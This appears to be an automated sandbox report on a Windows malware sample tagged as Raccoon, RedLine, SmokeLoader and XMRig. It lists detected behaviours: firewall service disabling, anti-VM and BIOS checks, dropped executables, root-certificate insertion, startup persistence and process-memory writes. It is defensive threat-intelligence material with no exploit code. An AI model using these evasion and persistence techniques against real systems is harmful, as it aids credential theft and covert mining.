Malware Analysis Report

2025-01-02 10:32

Sample ID 210919-wvgezscda2
Target 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
SHA256 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
Tags
raccoon redline smokeloader xmrig @apafanaell udp backdoor discovery evasion infostealer miner spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8

Threat Level: Known bad

The file 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8 was found to be: Known bad.

Malicious Activity Summary

raccoon redline smokeloader xmrig @apafanaell udp backdoor discovery evasion infostealer miner spyware stealer themida trojan upx

SmokeLoader

RedLine Payload

xmrig

Modifies security service

Raccoon

RedLine

XMRig Miner Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Executes dropped EXE

Downloads MZ/PE file

UPX packed file

Checks BIOS information in registry

Deletes itself

Reads user/profile data of web browsers

Themida packer

Loads dropped DLL

Reads user/profile data of local email clients

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-19 18:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-19 18:14

Reported

2021-09-19 18:16

Platform

win10-en

Max time kernel

150s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\745A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
N/A N/A C:\ProgramData\Systemd\dllhoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\199b1g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\199b1g.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7974777.scr N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\215E.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\199b1g.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance N/A N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3517.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 3080 wrote to memory of 4784 N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe
PID 3080 wrote to memory of 4784 N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe
PID 3080 wrote to memory of 4784 N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe
PID 3080 wrote to memory of 4920 N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe
PID 3080 wrote to memory of 4920 N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe
PID 3080 wrote to memory of 4920 N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe
PID 3080 wrote to memory of 5024 N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe
PID 3080 wrote to memory of 5024 N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe
PID 3080 wrote to memory of 5024 N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe
PID 3080 wrote to memory of 4100 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe
PID 3080 wrote to memory of 4100 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe
PID 3080 wrote to memory of 4100 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe
PID 3080 wrote to memory of 4128 N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe
PID 3080 wrote to memory of 4128 N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe
PID 3080 wrote to memory of 4128 N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe
PID 3080 wrote to memory of 4448 N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe
PID 3080 wrote to memory of 4448 N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe
PID 3080 wrote to memory of 4448 N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe
PID 3080 wrote to memory of 4488 N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe
PID 3080 wrote to memory of 4488 N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe
PID 3080 wrote to memory of 4488 N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe
PID 3080 wrote to memory of 4600 N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 3080 wrote to memory of 4600 N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 3080 wrote to memory of 4600 N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 3080 wrote to memory of 616 N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 3080 wrote to memory of 616 N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 3080 wrote to memory of 616 N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 3080 wrote to memory of 1192 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe
PID 3080 wrote to memory of 1192 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe
PID 1192 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe C:\Windows\system32\cmd.exe
PID 1488 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
PID 1488 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
PID 1488 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
PID 1488 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 3080 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\745A.exe
PID 3080 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\745A.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

C:\Users\Admin\AppData\Local\Temp\215E.exe

C:\Users\Admin\AppData\Local\Temp\215E.exe

C:\Users\Admin\AppData\Local\Temp\2F3A.exe

